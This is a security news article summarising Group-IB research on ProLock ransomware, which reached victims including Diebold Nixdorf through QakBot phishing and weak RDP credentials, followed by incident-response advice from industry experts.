Diebold Nixdorf ATM attack by ProLock ransomware used QakBot trojan to access networks

News by Rene Millman

ProLock ransomware also exploits unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.

Security researchers have discovered that the ProLock ransomware has teamed up with the QakBot trojan to gain access to victims’ infrastructure.

In a blog post, Oleg Skulkin, senior digital forensics analyst at Group-IB, said ProLock first emerged in March this year as the successor of PwndLocker. That ransomware was responsible for the attack on Illinois' Lasalle County. The new ransomware successfully attacked Diebold Nixdorf - one of the major ATM providers – at the end of April.

The ransomware uses two attack vectors, QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.

Skulkin said that QakBot was a more interesting vector as that trojan was at one point affiliated with the MegaCortex ransomware family. QakBot is distributed via phishing campaigns.

Once a victim downloads and opens a weaponised document, malicious macros are enabled, and PowerShell is launched and used to download and run QakBot payload from the C2 server.

In case of RDP access, valid accounts are used to gain persistence in the network. QakBot, on the other hand, uses multiple persistence mechanisms – most often Run keys and scheduled tasks, said the researcher.

QakBot also helps the ransomware with detection evasion capabilities, keylogging, and credential dumping. ProLock uses privileged credentials to engage in network discovery. They include, but are not limited to, port scanning and Active Directory reconnaissance.

“In addition to a wide variety of scripts, attackers use AdFind – another popular tool used by many ransomware groups – to query Active Directory,” said Skulkin.

Prolock uses RDP to move laterally across networks. Attackers even have batch scripts in their arsenals to enable RDP access on the target hosts, according to researchers. It collects data which is archived with 7Zip and uses Rclone, a command line tool capable of synching files to and from different cloud storage providers.

It encrypts files adding a .proLock, .pr0Lock or .proL0ck extension to each encrypted file and leaves a ransom note asking for 35 Bitcoin, or approximately US$ 312,000 (£283,000).

Skulkin said that the group behind the ransomware has its own unique approach.

“With more and more cybercrime groups showing interest in enterprise ransomware deployment campaigns, some operators may be involved in deploying different ransomware families, so we'll likely see more overlaps in tactics, techniques and procedures,” he said.

Tony Cole, CTO at Attivo, told SC Media UK that the best way to deal with a ransomware attack like this is to be well prepared in advance of the attack through implementing current best practices to reduce exposure to risk.

“If/when an attack takes place enact your incident response plan. If you don’t have one in place, it’s best to reach out and immediately contact a recognised professional incident response team to help you through the process. If you’re a small company and don’t have the resources, ask local law enforcement for assistance. Basic initial steps include isolation of infected systems and careful review all connections that touch those systems,” he said.

Jamie Ahktar, co-founder and CEO at CyberSmart, told SC Media UK that the first and most important thing to do when an organisation has been hit by an attack is to disconnect the infected device from the network immediately (that means turning off GPS, Bluetooth, WiFi, etc) and removing external hardware like USB sticks and SD cards.

“Next, you should make everyone else in the company aware of the attack with advice on how to identify and avoid the attack themselves. The safest recovery method then is to wipe the device and restore its system and files using your backup data,” he said.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews